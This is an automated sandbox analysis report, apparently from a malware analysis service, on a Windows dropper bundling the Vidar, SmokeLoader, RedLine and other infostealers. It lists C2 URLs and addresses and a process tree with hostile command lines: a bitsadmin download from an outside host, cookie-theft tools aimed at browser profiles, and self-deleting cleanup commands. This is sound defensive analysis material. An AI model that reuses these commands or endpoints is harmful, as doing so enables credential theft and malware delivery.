Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (20).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 39 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 55 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
      • Modifies registry class
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2604
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2368
          • C:\Users\Admin\AppData\Local\Temp\8 (20).exe
            "C:\Users\Admin\AppData\Local\Temp\8 (20).exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:2208
            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3204
              • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\setup_install.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS48C06454\setup_install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:360
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3532
                  • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.exe
                    sonia_1.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3932
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_2.exe
                    sonia_2.exe
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:3948
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:732
                  • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_4.exe
                    sonia_4.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1556
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2144
                  • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_5.exe
                    sonia_5.exe
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    PID:3108
                    • C:\Users\Admin\Documents\tbcl_8RpXfRm0pUxUo_yrgLt.exe
                      "C:\Users\Admin\Documents\tbcl_8RpXfRm0pUxUo_yrgLt.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4832
                    • C:\Users\Admin\Documents\qViC1YrcTRQLKrl_ue4s3b3_.exe
                      "C:\Users\Admin\Documents\qViC1YrcTRQLKrl_ue4s3b3_.exe"
                      6⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:4520
                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:5276
                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:5964
                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:5248
                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:6068
                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                          PID:4148
                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          7⤵
                            PID:4180
                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            7⤵
                              PID:2324
                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                                PID:3884
                            • C:\Users\Admin\Documents\7vK2zevLKW5GFB4z2PVxChca.exe
                              "C:\Users\Admin\Documents\7vK2zevLKW5GFB4z2PVxChca.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4736
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                7⤵
                                  PID:4180
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    8⤵
                                    • Kills process with taskkill
                                    PID:5352
                              • C:\Users\Admin\Documents\7cDJyJu8g3_Vx9Y9k7DSsh_K.exe
                                "C:\Users\Admin\Documents\7cDJyJu8g3_Vx9Y9k7DSsh_K.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4664
                                • C:\Users\Admin\Documents\7cDJyJu8g3_Vx9Y9k7DSsh_K.exe
                                  "C:\Users\Admin\Documents\7cDJyJu8g3_Vx9Y9k7DSsh_K.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4388
                              • C:\Users\Admin\Documents\M18hb3WlUL4LlYlUZ8Xn_2b3.exe
                                "C:\Users\Admin\Documents\M18hb3WlUL4LlYlUZ8Xn_2b3.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4672
                              • C:\Users\Admin\Documents\yedHv39pfeiS3dfIgjEdbJ4C.exe
                                "C:\Users\Admin\Documents\yedHv39pfeiS3dfIgjEdbJ4C.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4596
                              • C:\Users\Admin\Documents\L1xBusg1iI2ppZIZ3q0HFn8v.exe
                                "C:\Users\Admin\Documents\L1xBusg1iI2ppZIZ3q0HFn8v.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                PID:4684
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                  7⤵
                                    PID:4656
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                    7⤵
                                      PID:1692
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                      7⤵
                                        PID:540
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                        7⤵
                                          PID:5988
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3444
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4616
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                          7⤵
                                            PID:4032
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                            7⤵
                                            • Checks for any installed AV software in registry
                                            PID:5908
                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                            7⤵
                                            • Download via BitsAdmin
                                            PID:5724
                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9yxuhzdcsCQOsR1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                            7⤵
                                              PID:5788
                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peUceGKxekxxDSRT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                              7⤵
                                                PID:4816
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:6076
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:1432
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:1844
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5476
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5156
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:5764
                                                          • C:\Windows\system32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Drops file in System32 directory
                                                            • Drops file in Program Files directory
                                                            PID:6096
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5876
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4588
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5300
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                                7⤵
                                                                • Drops file in Program Files directory
                                                                PID:4316
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE893.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3348
                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:5344
                                                              • C:\Users\Admin\Documents\WK6bvrfiPFNMT3M_1KptU8Nu.exe
                                                                "C:\Users\Admin\Documents\WK6bvrfiPFNMT3M_1KptU8Nu.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4400
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 660
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4784
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 676
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:964
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 680
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5092
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 716
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4160
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 1080
                                                                  7⤵
                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                  • Program crash
                                                                  PID:4912
                                                              • C:\Users\Admin\Documents\CdKMqKfoIXgQdXGEWvsZplMq.exe
                                                                "C:\Users\Admin\Documents\CdKMqKfoIXgQdXGEWvsZplMq.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4476
                                                                • C:\Users\Admin\Documents\CdKMqKfoIXgQdXGEWvsZplMq.exe
                                                                  "{path}"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks processor information in registry
                                                                  PID:4328
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im CdKMqKfoIXgQdXGEWvsZplMq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\CdKMqKfoIXgQdXGEWvsZplMq.exe" & del C:\ProgramData\*.dll & exit
                                                                    8⤵
                                                                      PID:3620
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im CdKMqKfoIXgQdXGEWvsZplMq.exe /f
                                                                        9⤵
                                                                        • Kills process with taskkill
                                                                        PID:5228
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 6
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:5844
                                                                • C:\Users\Admin\Documents\2T2yTPmAeNuLfAwapw1RHOGz.exe
                                                                  "C:\Users\Admin\Documents\2T2yTPmAeNuLfAwapw1RHOGz.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4608
                                                                  • C:\Users\Admin\Documents\2T2yTPmAeNuLfAwapw1RHOGz.exe
                                                                    "C:\Users\Admin\Documents\2T2yTPmAeNuLfAwapw1RHOGz.exe" -a
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:1432
                                                                • C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe
                                                                  "C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe"
                                                                  6⤵
                                                                    PID:4160
                                                                    • C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe
                                                                      C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe
                                                                      7⤵
                                                                        PID:2036
                                                                      • C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe
                                                                        C:\Users\Admin\Documents\Zgc7nHHYsDvn6VGxx0OinhzG.exe
                                                                        7⤵
                                                                          PID:4616
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 24
                                                                            8⤵
                                                                            • Program crash
                                                                            PID:5032
                                                                      • C:\Users\Admin\Documents\uHnhdNlkJuneglbc0ATwRad2.exe
                                                                        "C:\Users\Admin\Documents\uHnhdNlkJuneglbc0ATwRad2.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:4156
                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Drops startup file
                                                                          PID:4152
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:5128
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                            8⤵
                                                                              PID:3444
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5868
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              8⤵
                                                                                PID:4256
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:5324
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                  8⤵
                                                                                    PID:6084
                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4316
                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4572
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2036
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4508
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:5304
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                        PID:2128
                                                                                  • C:\Users\Admin\Documents\JiFGnfy8ZlgOyWjJp74mh4pa.exe
                                                                                    "C:\Users\Admin\Documents\JiFGnfy8ZlgOyWjJp74mh4pa.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4132
                                                                                    • C:\Users\Admin\Documents\JiFGnfy8ZlgOyWjJp74mh4pa.exe
                                                                                      "C:\Users\Admin\Documents\JiFGnfy8ZlgOyWjJp74mh4pa.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:4992
                                                                                  • C:\Users\Admin\Documents\rORoxZyh6PrOqhxT79gRX7Jn.exe
                                                                                    "C:\Users\Admin\Documents\rORoxZyh6PrOqhxT79gRX7Jn.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:4940
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im rORoxZyh6PrOqhxT79gRX7Jn.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\rORoxZyh6PrOqhxT79gRX7Jn.exe" & del C:\ProgramData\*.dll & exit
                                                                                      7⤵
                                                                                        PID:6000
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im rORoxZyh6PrOqhxT79gRX7Jn.exe /f
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Kills process with taskkill
